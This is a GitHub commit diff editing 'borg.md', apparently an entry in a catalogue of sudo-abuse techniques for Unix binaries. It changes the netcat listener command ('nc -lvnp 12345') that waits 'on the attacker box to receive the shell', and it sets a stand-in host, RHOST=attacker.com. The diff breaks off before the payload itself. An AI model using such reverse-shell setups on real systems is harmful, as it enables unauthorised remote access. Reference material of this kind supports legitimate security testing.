Update borg.md

This commit is contained in:
JM Sanchez
2024-08-18 23:47:21 +08:00
committed by GitHub
parent b2d28b6a18
commit 458b5d2b86

View File

@@ -1,6 +1,6 @@
---
sudo:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- description: Run `nc -lvnp 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345